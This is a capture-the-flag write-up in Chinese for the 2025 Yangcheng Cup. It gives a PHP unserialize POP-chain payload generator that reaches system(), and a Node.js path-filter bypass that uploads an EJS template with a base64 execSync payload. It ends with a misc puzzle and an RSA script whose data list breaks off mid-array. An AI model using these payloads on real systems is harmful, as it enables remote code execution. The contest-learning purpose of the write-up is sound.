2025羊城杯網絡安全大賽 wp

ycb wp

Web

ez_unserialize

<?php

error_reporting(0);
highlight_file(__FILE__);

class A {
    public $first;
    public $step;
    public $next;

    public function __construct() {
        $this->first = "繼續加油！";
    }

    public function start() {
        echo $this->next;
    }
}

class E {
    private $you;
    public $found;
    private $secret = "admin123";

    public function __get($name){
        if($name === "secret") {
            echo "<br>".$name." maybe is here!</br>";
            $this->found->check();
        }
    }
}

class F {
    public $fifth;
    public $step;
    public $finalstep;

    public function check() {
        if(preg_match("/U/",$this->finalstep)) {
            echo "仔細想想！";
        }
        else {
            $this->step = new $this->finalstep();
            ($this->step)();
        }
    }
}

class H {
    public $who;
    public $are;
    public $you;

    public function __construct() {
        $this->you = "nobody";
    }

    public function __destruct() {
        $this->who->start();
    }
}

class N {
    public $congratulation;
    public $yougotit;

    public function __call(string $func_name, array $args) {
        return call_user_func($func_name,$args[0]);
    }
}

class U {
    public $almost;
    public $there;
    public $cmd;

    public function __construct() {
        $this->there = new N();
        $this->cmd = $_POST['cmd'];
    }

    public function __invoke() {
        return $this->there->system($this->cmd);
    }
}

class V {
    public $good;
    public $keep;
    public $dowhat;
    public $go;

    public function __toString() {
        $abc = $this->dowhat;
        $this->go->$abc;
        return "<br>Win!!!</br>";
    }
}

unserialize($_POST['payload']);

?>

類 H：析構方法__destruct()會調用$this->who->start()，是觸發鏈的起點。
類 A：start()方法會輸出$this->next，若$this->next是對象且觸發__toString()方法。
類 V：__toString()方法會執行$this->go->$this->dowhat，若$dowhat為secret，則訪問類 E 的secret屬性。
類 E：__get("secret")方法會調用$this->found->check()。
類 F：check()方法會判斷$finalstep是否不含"U"，若通過則實例化$finalstep類并調用其__invoke()方法。
類 U：__invoke()方法通過類 N 的__call()調用system($this->cmd)，實現命令執行。

H.__destruct() → A.start() → V.__toString() → E.__get("secret") → F.check() → U.__invoke() → N.__call() → system(cmd)

<?php
class H {
    public $who;
}

class A {
    public $next;
}

class V {
    public $dowhat;
    public $go;
}

class E {
    public $found;
}

class F {
    public $finalstep;
}

// 構造調用鏈
$h = new H();
$h->who = new A();
$h->who->next = new V();
$h->who->next->dowhat = "secret";
$h->who->next->go = new E();
$h->who->next->go->found = new F();
$h->who->next->go->found->finalstep = "u"; // 小寫u繞過正則

// 生成payload
echo "payload=" . urlencode(serialize($h));
?>

staticNodeService

給了代碼

看Security middleware部分

app.use((req, res, next) => {
    if (typeof req.path !== 'string' || 
            (typeof req.query.templ !== 'string' && typeof req.query.templ !== 'undefined')
        ) res.status(500).send('Error parsing path');
    else if (/js$|\.\./i.test(req.path)) res.status(403).send('Denied filename');
    else next();
})

這個正則表達式檢查路徑中是否包含：

以 js 結尾的字符串（js$）
包含 ..（表示父目錄，可能用于路徑遍歷攻擊）
i 標志表示不區分大小寫

如果路徑符合上述模式，會返回 403 錯誤（禁止訪問）并發送 "Denied filename" 消息。

再看到PUT處理邏輯

第一個點路由拼接

const filePath = path.join(STATIC_DIR, req.path);

這行代碼通過 path.join() 方法將靜態文件目錄（STATIC_DIR）與請求路徑（req.path）拼接起來，形成要操作的文件的完整路徑。

STATIC_DIR = /var/www/static
req.path = /images/logo.png

拼接后：

plaintext

path.join('/var/www/static', '/images/logo.png') 
// 結果：/var/www/static/images/logo.png

這會指向服務器上 static 目錄下的 images/logo.png 文件。

第二個點傳參

    fs.writeFile(filePath, Buffer.from(req.body.content, 'base64'), (err) => {
        if (err) {
            return res.status(500).send('Error writing file');
        }
        res.status(201).send('File created/updated');
    });

從請求體（req.body）中獲取 content 字段
將 base64 編碼的內容解碼為 Buffer
使用 fs.writeFile() 異步寫入文件

也就是我們現在能寫入文件，那怎么去觸發？

// serve index for better viewing
function serveIndex(req, res) {
    var templ = req.query.templ || 'index';
    var lsPath = path.join(__dirname, req.path);
    try {
        res.render(templ, {
            filenames: fs.readdirSync(lsPath),
            path: req.path
        });
    } catch (e) {
        console.log(e);
        res.status(500).send('Error rendering page');
    }
}

使用 fs.readdirSync(lsPath) 同步讀取目標目錄下的所有文件 / 目錄名，返回一個數組

那么我們思路就出來了，先上傳一個ejs，正則繞過一下，然后通過templ參數讀取

第一步繞過正則使用/. /views/1.ejs/.

然后在/在templ參數

多次嘗試后是/readflag

{"content": "PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCcvcmVhZGZsYWcnKSAlPg=="}

MISC

成功男人背后的女人

先firework8打開

01000100010000010101001101000011
01010100010001100111101101110111
00110000011011010100010101001110
01011111011000100110010101101000
00110001011011100100010001011111
01001101010001010110111001111101

別笑，你試你也過不了第二關

第一關
a='      #    ';b='##### ';c='  #   #';d='#   #  #';e=' #     # ';f='#####  ';g=' ###   #';h='  #####';hilogo=f+f+g+a+h+' '+b+b+f+g+a+h+'\n'+'#  '+a+d+a+c+e+a+d+a+c+'\n'+'#  '+a+f+'#'+a+c+e+a+f+'#'+a+c+'\n'+'#  '+a+d+a+c+e+a+d+a+c+'\n'+f+f+d+'####'+h+h+' '+b+b+f+d+'####'+h+h

第二關
'tsnrhtdd'[n%5*(n%100^15>4>n%10)::4]

這個 8 字符字符串是 “密碼本”，通過切片步長 4（[::4]）拆分出 4 種后綴，原理如下：

字符串索引	0	1	2	3	4	5	6	7
字符	t	s	n	r	h	t	d	d
切片規則	從索引 `k` 開始，每 4 個字符取 1 個
切片結果	k=0 → t+h = `th`	k=1 → s+t = `st`	k=2 → n+d = `nd`	k=3 → r+d = `rd`

簡單說：索引 k 決定取哪種后綴，k=0 是 th、k=1 是 st、k=2 是 nd、k=3 是 rd。

索引 k 的計算邏輯是 n%5*(條件)，分兩部分拆解：

基礎值：n%5

用 n%5 直接映射 “常規后綴”：

n%5=0 → th（k=0）、n%5=1 → st（k=1）、n%5=2 → nd（k=2）、n%5=3 → rd（k=3）、n%5=4 → th（k=0，因 4 * 條件后仍為 0），完美覆蓋常規場景。
開關：n%100^15>4>n%10

這是 “特殊情況過濾器”，用異或（^） 和鏈式比較壓縮邏輯，結果為 True（1）或 False（0）：
1. n%100^15>4：排除 11-19（11^15=4、1215=3…19^15=12，僅 11-19 結果 ≤4，其余 >4）；
2. 4>n%10：確保個位數是 0-3（只有這類數需要區分 st/nd/rd）；
3. 組合效果：只有 “個位數 1-3 且不在 11-19” 時條件為 True，此時保留 n%5 計算的 k；否則條件為 False，k=0（強制用 th），正好處理所有特殊情況。

Crypto

瑞德的一生

from sage.all import PolynomialRing, Zmod
from Crypto.Util.number import long_to_bytes
from tqdm import tqdm

# RSA 解密參數配置
MODULUS = 7494062703769887703668081866565274579333132167014632821313548612356114287792191446305040778987677683423969025588609780586722302041792065732461222120206217  # 模數 N
BASE = 176589407974509728660827257088337183280645510941533692756437851307282715528543669659120503474533510718918949406280646936944629296899342927397139761503564     # 基數 X
ENCRYPTED_DATA = [1719131405161789300725716547614879725769113740628924228040533454917595622840903436228598969968521441543327057141589401318966713711269892553169244263117465, 964113278787679232296826248818761720259710649328239642627188771651887183698074369890065312129654041092751189904383511692340770351754022502563890149659129, 7180032100218555793581544809570003629664245733070965678131518584876407472850051881863073521320984755175945971940415556560131906637963087186858520080371697, 7278553181711679696938086046655211422150759150466563658652641932706121629090932321563533275034734532076001967063515644128656393602962743436588691292550955, 7071562327710704879223575342701708951735351528142781335702085495652888149086906082135202373228913497958762517436624355411885769802496504666565676354985971, 3413965163746989076799750139073767902883585409040347485175384880698286295086116450668908874661042930824632513226077293241606579860623548134540683517014908, 2493137980419237578727401577689050256924458164349933679492226475837903464940854113255706502836954377682774302990058903802342341709302505294390801418750725, 703749624169528649423172151303101271192646139978197863166201332808455945099668517680963637470919081711543250526686176341295014062217859435692959000684769, 5552777372006623762153637976206247373873064461567116514205583015221459837217534008241238757247008799091465340261767773126491113196555017701224186953871694, 918649881529006356022520486484816231512805666160156627813534426042413247168928588303906281917327740699957845171374473789655487919668241329243582133954931, 6285703978527192585551573159606891208930436794516107083852218894119508169694143877674524233655827715834164790920008898708700696212875308975667988629122600, 4565821131595301933027502011473548351089153049383736095377526401155102463159616751554487101099963154256032338275289954196137233514236675026771669397448591, 7354028408293897066124750524181484721476818972892986974136543818332765017277627873430403568253740054915458886382543189082170087240348487233398435732750668, 5370948506146077094477619584844164469450740193602636179774449455880127521628083109335128118173115534332610858463108611379783295442004063901920934588114927, 5264618249900492494641837734543042035149108592251970720538191486231178008150113960789983442446591641558872707125645452698961563246034360954061831483647213, 6513125139607784795945254209394480461700344202765834488190356889718379145623802939872464483348952974980390526647516251481867437041588167465850330579763279, 52620337023290013903914225415366398097451588140952655430359196997791680150602457532377218858805375839418974188909630862874595756881940113579562243211345, 775093554420559931175017266481645409428391257845026491067921163052421942334076885330764957368346786383962145902618781943739922097363252316652283607626263, 914048088241148826108371208942589405682469984630917274361586075697273909186257822025064357297723973525670314758846319856122628945064355266653202993561072, 1718758485465991841245414039195480938522644294472549748650221527950476049304595476485962732599997579150503368277783583981982889346987154927101507640880482, 3799868282388836525794433906036101559515644339038944651012322840059136746763222453358260146393852798092848063172360236554578223426132040539709695100381135, 3541865174568168697294834871089000487969014255500915579720513796774493370375651716014189600846999507589235976876008482115085123321108899283458508107510708, 6000111495661651346419232325628380353801785608433408743076908483918697534471280088938990190215957446604722506848253899718591876551867311203096077403838985, 6253643173046003965172103471353294842929872969494447058212794601954925177820636419552603198473445815972743097407679550852152643053405332612211745405332236, 3301079724821832397643038007452730675302156610908305347778741871384798374227946277783451519330389318088909510147809102641775328974699514390298731313909687, 1248278146668201292214327233268028972221372405786614328994300795922144408065760109909225108349965423934399901773817666437324209525167313013233374255490341, 17809989234426531897711362063266000858036114386386437955591948165647126143714107280698225084031485609653761182599374776216415414615725852044222386846495, 1661946354409283005503290687407078585313095801544853478234539059133082174146794355063441110138389247071025068313051928793440081562801370934061220659218973, 3481251444257400845597778000348529981407942860518360805860568277796650499062181666607012363114372102040179799153809888913119845876313769471779340858338876, 2969490420318820259350531448006231318278582262600049331743678866118050880783483645642510041073429073243453725770720706320332268044688750661292078028979335, 3746865059857437818811880344927694504919323866440456997581938615029691388341367848168362713237849327709450905392250312067571731330018497478067686594018132, 6414151657475702425103553484192843477569332767732269426785411087092730270913003364189614686242850187047986876258300960693169393750824177216508529662234213, 797558248081581269791936744046534433754102319942346494164420485093365412310220705062195475643430216836300501373037514530383745068731206920391719336107595, 211290089421069250441951189931336059679623894381773377988081018141988531437338679750645077474735601860432864842281371819708149824891948519030895420519030, 1794231920218065197933780116555108090284583898967611429728593823431793820927924520874618656711221536385876735688904568658652603348802173053969712727002386, 3268939580240611859647828123637929700992292317648760631515072489111975481961917697818232907939233298118646952108050134720023102457396554791758521988029264, 2910400866406729971100645087368695425677190058682583258307344966890785684989660612007133955031476064701915897780213369846363057638180652762644360056492393, 1753634247360680748520396316679919584195766557657458978557525310876515530033205449036099346746308520147633420067552976918114250433680953921765598314180983, 3876905776705628742632932249284622473357566092521460519013655727145234003433056636813923927778056586962023594055056861628544916760223760117474187444496545, 5959757039471505023113810701594324587613979217054687328781590028292142374208795570511709097095700111968262827984916208477693878444057263798564347709888202, 5374212474448450659724052626650430405673802248524884606302970663761976182941855505391179280755676342662418610617277668670474814168416896429520313939597767, 2055896889185207571213280393315847560444046333513466771957557479078164806187564643168577419348237799621057031775648293598347733861490373182820677381378382, 6084180500351180667123078393533693640255690580083210646267468404882571183094540661640084049762845414479154593898375602385822298574856183074850792911106475, 3373312774563093163010129680151226058105319897529241198281250691928195482716352650367126227218466856118453618801529505737903976091284055911347689061302750, 5600613756600329901263575945885648357446016071302264740790132322511618527641942000971067162511999091860865805745249550461955543014240889756869610044386830, 565945146556577370175269421734632130524544950564185000012594191146156168497827802421464428023451361587487129791827715132740776489947656482876818041710395, 4419359702572617933720973032897202104646156281092165587096093691060322910173330285963896187228742075336248059736486715312182113162090187842887917225198105, 6732924059366668920894385271467332116626834821924295390130136750095051875943650636754241219922832137028249995112017036271155409562266791406988328139570914, 4495392885128829930220662200671891479267861280799207451437151436346621655603861139464288261571103158714822386121519285152743695793865889942477607602335718, 516191395086928212766209551469502961241039772380081865514258427895634350230591557920648679951263902670998816757819699890588888029203352232210221754736785, 4146487915484179974920534563827027195707813478625722951261821711910606845153039576521959101508563215765201044289048428600908217925837652310124915510341932, 3432461154387141838854432302561862411336401854462422257017481125487610204007668654133357657106930012600550268131672691788212721805565222845238288446619087, 3601254026199630323639535442605056670834549469220992976345167307635004486606724216487154765164573243066829330632733535122894678992653727052397053986132826, 1618063488973978707067053379809094677794500564413909131937711646498014134984829972479531757101147953755592304581380642611170793926818523115210707234712044, 3299106147405405908279511567977405684598081731617232933690852353587668822362490176897266329385254166643165981901178981601148310259069261270946712307052287, 6846858880481923863775499748822777630389003917575860624692860915711629300260394413803865317383341262667738631584376587860442474485970911811441407998869505, 3215680123677279767509383928448414910856154132962428054738233887551725977011900633509877553773159881830993305654759486684559926162336270761361352903248906, 5496469100230626535889840978610193061034187786011281763132817534290427827123490940379914187047736591224080465866972686806917004455884875885392072705136262, 2864050448866689851550126165042634463286502493605078932118550500351115607434286505518309707879537491758153292649368748959232286095713413881178866211306184, 4500794235021983581118801298719932989859621658774316125080804907737574170999060405545603577489994073878810075348075173731946880543329899745443548732444876, 1701258881406817837344122213432825514317089016840026389777486407711921900810281151668164504886822337041945914284089154555311876886738916586249310394242144, 2984171462545577867693527742598733850500836872522276155309752203056132077977619491102054726531485591179847361987296235015922863770262186186618295183723446, 1998926203120106981499354901600209873092892311318255853016669434308301371829441087485487756331320946452792335453335927680373337041761159842898915149201179, 3469492629999069000683776994430893428957909349310623249977562094476709953253742271332297853445535357225146261322101259474378435384708678748415720242467540, 3349914475771629308828905917005193744238305669008642078094341995325423686776721646729474139382764356959059181003457997283589709318709203241867049163256581, 7468392128544523237775713086484103908765148777703251720272918323202486976726742964761491640452081344737220655815645963181061363248298874559444900262714573, 1729266554298711903381745052839477316871436688839679347808674399146779681916568119199086784315276797289562994666044199187380582322617844969124430814454548, 6228538620625194287858621303133971552150705646650758139647779023432126427549820480427618151324541658924957545324616066238824061705745633641214275957991081, 3546839468720225332704665245411296743840905483219842481039719851980894104931923459881724541431075969186280998189306821850975671317650029607773347695916161, 5003551427084428983200151485032425697792005126337901966755431797351030500718183179132025845871647589818441943961234639702209617589496987864848129100127593, 6643401571072392628300121738027765343357360200657797255110143010788618241485245543978227055741141818227818343153034503487586819791678669963057997929991784, 2562918413517151253133047147553339218659758059455474492224243333036381745640439788034759400244452717377825285968188174779261990526295746984726199948357377, 7437872392009105990711193901375305261532202846600610535045509813031250270429778869989270561580501500053229850333918780287345929478293978347645384915059905, 6850572829594419931082710249610527681880536306821912519718049378340748365289283573389390433493649860281921041642014059014544763795622118890759757777078249, 5391075547621734143075000188679602652140572736807843159481908765322403510781102362672205531750495436812820132672226065133195582321646835642286378831941543, 3935125186916665518328217311726809099639764144566121189586832906641425799098767258076447046528585648386651376836505914154172263924716118916975346746484099, 4572088871540278868361905512095201060151895510763732328882273392847208802234202258956786836058932994420932737481854686339575922886423137765225784049712773, 2262643703371965676721577847097874053651347517824305607234082573017945386641624532722022439799966228277016547769814923059355040626796832522381865787641290, 2092350463144324366602244022289003459109077119526268364543250731686788098419000629227383382147140047995570425746800878972214312249056004421397989221181338, 7316680967185838685819431514989962013693801413153393375368271255171711307966620721060733924670697124665299505476656849274808551385135203863367484594415282, 3992707215646916729947167763158938832402267287149607401065208090606939456846897741262125062082608028914675505843323650110360837429016638270325538346446529, 3069746271933542384918749040106031985080879021375771977808787824764440797512721099584567534097066479635471475762441199886178414827079781736989960199117761, 1766633502410468840542337696250749470477723118225887560860892798969566958310115225512339080511591120596372154776271396511188940759539840806867695088697687, 7422176702934281594092464214932251290119989126208580876623712378595196239646922555040920923651335839658719813178585655273281566581347270942656459655633831, 1076250672488724366299364554828924941179689773925009019426859578123703178494639141377582749659649879771331267946731559750959047347777630832570175900797396, 1410907054396321048600218685349536875889137424876811975163068514508744181288075473743359405875373746597490437227185497238385367523145376472201142188317007, 1399913830686011566618870183203250354810701185080554159064967796846290561704336488321559729397413774978460864013425684578017379091810583345546666411795427, 5442664420577177620905419312024116329584632622515715585913615715633055426416008950934670882398446114586893092091857963411004865110303405260629693479911547, 5444954789918365554465548204039461146997193180749209395789901122397246308255827362981351771251560236242646255496804381448717329602292037192555016677597049, 3692498380370159772309045715435436241311628169449536956138346402344911382662589313178130546965271962111797201610136351183369686485141336803226085619418804, 1661763472840328250526914905015525414406950272006598484866292191029914199500142371574046051673263254115284188720822715119568858243297684058718905784007684, 3591970782090757037238666567970281294829543992746927793222143235830463164152104415435233805874218282003088257755255830086210161671004004657169607587797031, 6408023979766552418323731655071232468814820721387864760342245227191599544467260453668301692632258293269233587788621263414509088714249331129218692482482634, 5107805331532175484179055961952547381531796475066432203418372765456840027280422837685555493805745435808655780536058639621407087913202784702495464911546300, 4797651536825295062608601255174248375502070662844324403061332457315754966507899734291832623874042314773932234723903300304673474844878044257723908663143633, 3381383877574350137522503821651560196443655576836134099019270524161940339533213692251540628743332895341002631990265662425131251518493693690750762808468808, 6958313731633073957446795849813233488765978764962619450590198540106777161715713215615033500808990591065365646295188315739669894282317319917228576278018406, 1960896405831292842605946619322834459362478823214925598149312724064328946214721789578814421678051144409236436766449112453593003328541192215192091933636734, 5632565434189438511307970717039852422184650151810607594958003725375385054015515256694405836817603452184736804987152881592354076205852546432030648057787591, 3603573992862714326961608272055291746708398966644592880817919800689293996666084571360391289272725497533046437441348306893175193890447914165494201524939611, 7474903502691814215567498428036645893505450281007799941238583338927406722102074074886778315274903489297377307154589449296202274148415972995482124963310378, 4453834861530051663457391436061966674036353387512847924098267394664245614544771920533048953529726769319902426772202891922371527902437458995604135559897851, 1102786889014137499942575507239978485536138217014375582488960413776215256742762391575571866269018253288039614227206226202039543826442945749886489020760555, 5819181457783611322733307742961052216159362723583927036792457371068806372047511415871771095654975468667138447780552955555513555056638821310631326088097594, 5350783653088149702130249422975425885358619638687285801319976913799219400957008639254989350379956422983174438616208248304178124943482159284688856427882476, 5407975892037877366747748247782784942626359392474490780401414242364609402709342063455017157687455426515562553403339115651619199260531719653695957995846884, 3794517216114524931330568036328063154438742706470430935271654450101636722629201788600435538678842639282204176078037775374577552489185921746586909494709350, 4813028683812337453439667232870428903347796255558450545195312222045031131530622492027570707117120567406833197112818961728314990337577549922000049162253026, 4168736532607887316867349506801730616149871937845395236694642506228574010442218053546084300084732240913201464341954608314193461339805167148965648305420065, 1644304673790151876822988473398685569445274466381097877774007588201165178580712478468318447654023766385962993642034440933486990087125016522481841525554418, 3272323811435548017098544676604826007281263207819707608974094419359845453827034021810308365205803808699793720434269958662733173559568693626725823830523951, 5113801222212223501585351730986251406089347057933870761166300252137101694946534210218482910779905716901903269585780429909114166918554650475679698939666960, 7367185236608014997144093713637831607813060347567225401435614840750615529359174788566627712415047019096391395987848751359211444320984364229040264232250347, 7328203064198766407620423511688647756732110754940462554167359942514912469472984874557396302639411097192166622739582506684090980853183532355356052013342850, 4523437218949006375173147004821491515506102502361607007444566307575381985145543164175889101976649601833859052269744348750790852031674142142321082080085374, 4273724505478240709533318976927602969075241856805102930644158874077102056271888560132009557308681384622946139372093763035004181594255612915451147736163922, 6633892462580042565075916146394014519934031456492581582696232902841995103321193422188963008664195377729749850289925799058143308539926631025298457869995251, 6169509944247962483385971098172418516592483966802035575349146386090325439457514069888832962415975113879881882573914698994132676970153204571161798060426959, 3256285626248446069935491899723799034095282472203915097687613854820767136629593585466663358480862140720477783952337168780774053750557343432373284719605324, 6331048185438636381128034307611846554199395294157903145386120516890114507132379097517463425180202574846193494950209454453553632205650001493733796628519904, 872181738403065361439465891100646927249351162552483924373320861025554171774143898435330437623419172431604704073899981678143805063125593789710949875122516, 1406480544629309137345942503005833292510530606658754179375250810785708465402024768464574239863242249391002243795549240771838259960328505710236917365602769, 4020383517365233059652253581665251883953184234325259330945739695799565543827794949986727000716633411556662208246902665789611951648513529158140999200113024, 7346076089884028559213574134808525732835095306489092835918646066756549284164774398813938145931120912498453579901815220219468490650593937084291990354288211, 1008972434939439799331810249262929830147469066388391203665051305919048565370719225975124026561354338584744357462875437960517547611547607749587446866984935, 1138122237018236024935463826962583703013383242319197251197782587764218994663318123794558118605019789805912019355702488748683288332172316540925168750693011, 2885036516023118722030225530875914783030452796945378973822517308409880007238921004962651806591949710395931071204946896956729539921657348605524380894930856, 1174919165709784308313801272529063114770102638642632279330761419309844157681097269146632909060905564422190917511823912287330982603321715149175424540807952, 1822172277602306307918505892660741934416829038575877346501827396986090046799230643060549831664309656676810862706623935921947091407228861553729177922296318, 5798551777325590632177977920490032880922603263787513188996760608217601251643800441987111233182981986500698853750265906110850519820622976320938277809651087, 1631039142231125671063485591884891109153446082339835397144824990636459540931037399276151130348668419063784251547609053785203594251895728982617545190172625, 6822585018808395924522283374321949362419741477559411771776139631041068953146298150241412984989810280716688415214705618585831740551540546538938751840941920, 7392532999825772747021016705769857947580453970673977933293475059754713255060925594043184430406915634257748695843801122758002808630682607391762847322966347, 4200416043633707481976635763461864075711000129209355574856577928270114110650472059960184619083933076056361124269826078226332159847946066219525572748411389, 5831499177680618517701718051808100176327261455306947899404567341304172999546796257242430716284215830378313170750113495900378450488985702527654573407591604, 217382391939302040990707847001419780554662478483941291607895867830194763224547323386206597668684960652790216684122921104785843850008974226089640615359588, 3563421241650880780082226567511705159836428557509283040300348054001847792941943033492209255595342155329311556390787151388283881020228395873713082890388429, 2834501312583471840305615819185051972323433904228846780534686268394437510952673347232865988163605618916585394772423752529382564690787164667296165701431097, 6868235591701962890942206085524935228181359564049485424902722254715745788451657979258980320805294461759383983309768035909047537011184542354343426226535954, 2772923054484873603401843956771430778727396268783883521927369969604621326253333175756879115590603548737490996783800762012865049710708133535816778453037797, 3622892067090536628337021012065353050269995872027790907041571871005896492558194343251769120410955308732501439323843012189523634511537530174600421000324152, 3174382616868334923945145958891531833810784973832007567638313125598593093295762652554591142635749155979753746488256396393014722030104836291045197465838874, 4256588447149423373516508900510905722182922233502507560440170423785411636330486332004710720420308453508981146707491199490587821515576748623301614087560564, 1736287477504227757504390658454291750300255766127813696614904571418247794506916009652664930087502577299347386893027620051682352657093167964886525901374421, 3326252254728387004599613046242779602412782347654728014950813737896800835206483664278000869822394572439763801102268423371282992356160440168810738590406525, 697910014539157236690695873831129300538900674883953291931508969476426457003962295226591860776440915513707907151961779292122853870463153483378009272618702, 2301211850580231081276758728582342727269395486786405951294889701663387598840276569902515897473453845027548603307049976566142946803424132635663886899432250, 315134629471600303606805305663881030546935294375038155917587099756091620477632647493152587633141267040852979734177862014845266092756864325812651667377650, 7105462121113915447812110852869002434387137111948584715566548923138131722450734296424572169741302092574907865287898578058110758999979994197441828438056921, 3300300591377886134914089272436825439726939308122191385395076321727068481400117340100390975845421186013797094071096642022701305779531240082056215170691907, 5209908581735885427030041366511127166296746421936096315739932763700621371081873203540124575726441671832663224261941004139363982285656624124076705570886583, 1154686459877886409675101523833930326905606252049963846151357136126939551475321758632100365527303102685404974694677599534847589621867621089770303699361285, 4768380791599822404044581653236224254694100631155418993737177544254889720459051883461358041571437042827894169852906850161204129565226838809765484772609831, 6519272360175262368113444254043218251217473485512896505557613922384188172491962719027588019777642497760243610433358337890526001529714004093998089260590115, 5539053249581890877425019909295492880000650434372972441302487949521423968861816558288431070612199580172360997204812583587269469469582544485916148352980019, 7180725493335662778242589228754248140612619896535054327216184922710308418403398518192440627395933541113479319874938811558186010920295694184045531485103301, 6439652947081203383226127185295273926558072564125585015396134417913331369040663238840768380192024806334946864694430434463548427598694769442936350810041659, 3245465276930424842770152552363153855198233375845821016547134156655891546285445242176777250757720931068083764965941212175322427899699774443320906683613429, 3330671010160974790941557013449713059118567356889116146371058133454602203996735161927560264154595456566285024657648571607105351387609456058119560350941195, 6821986419382358618871417612473438529471138091490778402693730492154877205917973035166251347694136203207428205689479652787363100732238063420083552446912260, 3973076314115837840388612845250760051181878076099196039596384407984515672700339516672228201427593379397452187399110835572187888841503596454971054349648092, 4936865509410441306003485456654600435810022782089161209298988331334616218685789921793418818836113871635837564047061992457013576475065200998084352420428693, 138700503419145956820788052657317918621923476051057398001983824874083519362023997368500147088665561211553435550394279482027931753726863922667218079958354, 2481786561756785207325906602147091808842497737642832788362792587651848852965242072409069192032646439501804678207202584354714469099159965020749372900819062, 2572966397365071070654120221944623158532775269276617023232067395512962802028977605646853130003871292401009669087150435707928913057761970531126725262527731, 6324132522312380727155066269548600361416732110581522652127899259603830770942464277650267364774579111002090549542565838880699852117422754835525652571111849, 2339251080737087010136154732037704737484014327068033130667640873437734095410095181193334660070307269260017108710970839423039789699516243549061662798490748, 596692309016675332246236030453828565625198232854941478287361932536236803232591604919152974295482597894350887233951933917242763428364741059557194730860867, 3231925023788832994639927822147159988469722574330335702382566517642756463720380913469258624450017736103858240295434431615794944500782164779140509374498292, 3706194213005303193311186330859543390006370237235447956684299837603246086860980931589920333787040703883765235094478833134950007831634936427977327272441677, 351024256493381590147178467314615210963956286682422412361822273493021814307927189899504167964982069941389869877771567529961020428594916729291351164766714, 5527906213702976931482774431672879512905804887186892574131908318992828241389901891585393350658310205639068315074785520510255856601931455867600239963166247, 2017076351585850676928548286482304434260902340533771340947124642362498045552976855585229734403073967099459032309056034517546496946485569947711672936232251, 6606391007643552845461410755750177103306894582904290466795769413855622944986111330918202181514262456259757426756554119919437597572245458049760121890685483, 3976794737583161555378790610288650216881769787265598693932584021164001340767600778974044896395016019753175398434145183346770881863807773607083321813152146, 1976570458025947190299436162893389666532602499144231965436624094292400273521696468612784292454941928317981225222042869102889153436884226004257306664186224, 1333572090763864365501788638833125474321640098421570543062623326970047533378026300659852738096446689374149500630940056168504384744386304121981986069074738, 4094376382372907931741683043621776016252091214115739978474741756393227937159593280931477025956477809531851227977187097210602357391255622982813562462642364, 6264383009683115307078394260047246870295578204759486788817491791169929708179029358066449000448698444449475236674501117676412946172614530804780574420628105, 199137086262687063307305416689167530127371905785989526590867601812049713978470802038076806024081100770722011954217193560464525063012271013485100046480434, 137370596585451885626683935778032489189662999701803014246673300724221630285697975615640788752297655925153936704108286838378712159128589227953108892839067, 1675200126924372537477404902440194684894618968086946292430615595770747465326052214117955845424144297606123329226704863582536702296456881683200467264953084, 920430840642252596014354586324532907994647101175450197778140838389450328950544750243919593649180694276270146041567020826626028986987527221446993999802488, 5728938330179054856695709301384161216687482774286804119491221949127809397170831911448918330662082491881325648917471998112751914425749543963813560036115462, 593719328270634636680020982754644279380725204638837460008530459410091974477057938651905935975022823774038282566052812040059930960095036828109547728808244, 1643546173278799238464393279676091384769967683609512488490651937924603308582697230534481193558624001742810286664081883578532841792706230914808086867461495, 4950051105207396429773774428166075000334954821837737397232251436180818678710199211724231773966528636362313843123212954531465462181993269072316970641483752, 2321277584052677386109144043102555431537463526323344804107445290609657090933455927487364656832031958873005142137183551206203381350955112720970983629475684, 4579436233520661038161884029091970187080828058613144386236685859057904033991019280601043878403765169660457722265308860322878865696640767650494852640425277, 18906136137848496579324560678747031381788029072767996841559376494499137524554845226393032530233707147980671422307838425424818115436891501593223022031827, 3649739447103582098076238608317392519612960237580342548776236425045996900841506099933841198429337672932374664711953830865692945603633311211804057613236324, 6228248267252875664628627371482930203797923900755249884900489349175534284948790784868686455242930775996109784153985021962472756596423498541138085487322723, 3232259016167568396088636124691186778872755608979528475941705605372538123982530089543735943732668890939456701500424525813466899287571731973313921868984805, 5230180726800777097714472558016559715011581240550241042117243307455060250183937192110232322958177161094301709569356532188804008960304943709517659100012009, 1316182411882810585716069785492527119939221679926043191741779246579486911220519569558733014732939798403126398938304154350259601846917283148808746705774112, 5171393541792955967386504096724384486848387545027162506058824561994639378771299850868388303197135071554546442555505669680390535567513140238066731199431524, 35024069142023136144503873705187851775772996841748742043201622416528228333326846510775142995357882951453924641801621144372669846361298917545554103413182, 2137302852938511100617562003058664983273624114396214242893654581723221516655474918148779088953177782808419941448719984559118447096665545427696709937842713, 209930536158403353785934337280825398110386976890317925283707497575319531810780655757933953255645828866209390042351830836279337190397061501517408059277687, 3872986020267814657409271626722062503718111147627634098489147832056854032602800946436266352602142926616365232206071229597298304206045230548365661951077522, 1353182967413395061816484502209760000851237923728283774521553129820727442479338500131723368608904090168808192168529256743509840312000677736865380507537597, 3989012311734412151789222401298139163313553222907339266222343038762544577268515336723689194007193558263264033766563400869470061614041222467740729897778945, 6657934627409610222724351577670649726837779633184629144454851695438238638414565047620038308540585583268640359657949347136804823986752924495443174820297207, 1939957578240465449128685156366892125093156232541825538491850379716359815561015886172690604751039310402525340002812702097520600710037750287074101266805367, 377509715569111235799348790189128852911568008132618928612437037657021563709052313331430741131984546631013729797441300895357352523422174174809430228688926, 7368177743257889839799014630889959868082821591970785238021132865083837866069262950226618481068147023276973364092377863002882245295200052579960501239119196, 530830086210176067129258565875145262804901495700273204508256051933953374358572473802632052068174957448979978484249171505601497376201648157539650093189283, 7376502080925571165446902809763768694636061410762198687423828839330038942134761149049375581034657573374142320225725569977961901705450162870025527855762012, 2116346943204098782880885073913590762111226360036146748574267130728082070017266442714183443559725139912906721658381591908291299672511209398838786833026709, 1199777635466712774822205543754218307068664346791144786672662649003222367801203289358430843195259606424099228487895878674265477055329794956881054654716026, 1065047154492119587809130315926266634540312877479768838833721668340501716669517402638318223576664315605450627948046791863572627510566106993841377518051440, 57633491995533694973891797097577071270988915839965047519210039437757302634275399532642415936872646564776006731728624721483663422906045459777596215800302, 4387332259562199732908790016236494236575320110997164079966354117865561681913540018569486901341373579954728471417127066360146207405700122791914392223220374, 